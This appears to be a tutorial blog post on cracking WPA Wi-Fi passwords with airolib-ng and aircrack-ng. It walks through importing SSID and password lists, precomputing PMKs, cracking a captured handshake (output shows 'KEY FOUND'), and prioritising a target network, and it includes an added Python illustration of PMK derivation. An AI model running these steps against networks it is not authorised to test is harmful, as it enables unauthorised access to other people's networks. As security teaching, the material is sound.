Note: I assume you already have a packet capture of a handshake. If not, run airodump-ng until you obtain a handshake, or, for the sake of practice, turn your victim card on and off to catch a capture while airodump-ng is running on that channel. I also assume you know the old way of cracking WPA; if not, I can post a guide on how to do that.
Setting up the databases:
First you need to create an SQLite3 database and import some SSIDs into it. If no database exists yet, airolib-ng will create one for you automatically. Create a list of SSIDs from your airodump-ng output, then import it with airolib-ng in the following format.
Create SSID list:
root@ficti0n:~# airolib-ng wpaDatabase --import essid ssidlist.txt
does not already exist, creating it...
Next, import your password list into the same database using the same format as for the SSIDs, but with the keyword passwd and your password list file. Here is the format, followed by an example.
Create Password List:
root@ficti0n:~# airolib-ng wpaDatabase --import passwd passwords.txt
The next command is optional: "clean" runs integrity checks on the database and reduces its size where possible.
root@ficti0n:~# airolib-ng wpaDatabase --clean all
Deleting invalid ESSIDs and passwords...
Deleting unreferenced PMKs...
Analysing index structure...
Vacuum-cleaning the database. This could take a while...
Checking database integrity...
Query done. 2 rows affected.
Create your PMKs:
Once all SSIDs and passwords are imported, you can compute the PMK hashes (one per SSID/password pair) with the following command.
root@ficti0n:~# airolib-ng wpaDatabase --batch
Computed 21 PMK in 0 seconds (21 PMK/s, 0 in buffer). All ESSID processed.
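As an added illustration (not code from the original post or from the aircrack-ng project), the Python below mirrors what --batch stores: one PMK per ESSID/password pair, derived as PBKDF2-HMAC-SHA1 over the passphrase with the ESSID as the salt, which is why a table is only useful for the exact ESSIDs it was built with. The SSID and password lists are constructed sample data; the "IEEE"/"password" pair is the published 802.11i test vector, and aircrack-ng reports this PMK as the "Master Key" in its output.

```python
import hashlib

# Constructed sample inputs, standing in for ssidlist.txt and passwords.txt.
# "IEEE" / "password" is the published 802.11i test vector, included so the
# derivation can be checked against a known PMK.
SSIDS = ["ficti0nAP", "IEEE"]
PASSWORDS = ["MyPassword", "password"]


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the WPA/WPA2 Pairwise Master Key.

    PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
    The SSID is the salt, so the same passphrase yields a different PMK on
    every network name; a precomputed table is bound to its ESSIDs.
    """
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("utf-8"), ssid.encode("utf-8"), 4096, 32
    )


def build_pmk_table(ssids, passwords):
    """Mirror what `airolib-ng --batch` computes: a PMK for every (ESSID, passwd) pair."""
    return {(s, p): wpa_pmk(p, s) for s in ssids for p in passwords}


def table_size(ssids, passwords):
    """Number of PMKs --batch has to compute for these lists."""
    return len(ssids) * len(passwords)


def lookup(table, ssid, passphrase):
    """Return the stored PMK, or None if the ESSID/passphrase pair was never precomputed."""
    return table.get((ssid, passphrase))


if __name__ == "__main__":
    table = build_pmk_table(SSIDS, PASSWORDS)
    print(f"Computed {len(table)} PMK")
    for (ssid, pw), pmk in table.items():
        print(f"{ssid:10} {pw:12} {pmk.hex()}")
```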
Now that the database holds PMK hashes for the WPA SSIDs in your area, you can run a crack against your output cap file to recover the password. If all goes well and the network's password is in your database, you are done.
root@ficti0n:~# aircrack-ng -r wpaDatabase Output-02.cap
Read 3347 packets.
# BSSID ESSID Encryption
1 00:18:F8:66:7E:CC ficti0nAP WPA (1 handshake)
Choosing first network as target.
Aircrack-ng 1.0 r1645
[00:00:00] 1 keys tested (240.91 k/s)
KEY FOUND! [ MyPassword ]
Master Key : 81 91 38 43 93 E5 28 6C 38 3F 3A 79 88 06 53 80
67 D5 24 01 6B BD 44 E6 5B D3 78 92 CE 85 66 60
Transient Key : A1 91 0B E1 2D 1C D9 31 73 A1 2B 7B 51 4E E6 C0
FE A9 61 49 0E B1 0B 19 76 D6 54 9D A4 4B 7B E3
00 05 DB 2B 90 0E DF DB F7 AB D2 53 26 6C E5 C9
1B 4B 73 1D 9D 94 15 9D 1E 51 79 94 F8 64 97 67
EAPOL HMAC : 15 55 71 33 DB A8 2C 6F 82 74 1E BF 70 72 1B F0
Another useful option: if you want to crack all the WPA networks but give one specific network priority, you can run the following SQL command to set that priority in the database.
root@ficti0n:~# airolib-ng wpaDatabase --sql 'update essid set prio=(select min(prio)-1 from essid) where essid="ficti0nAP";'
Query done. 1 rows affected.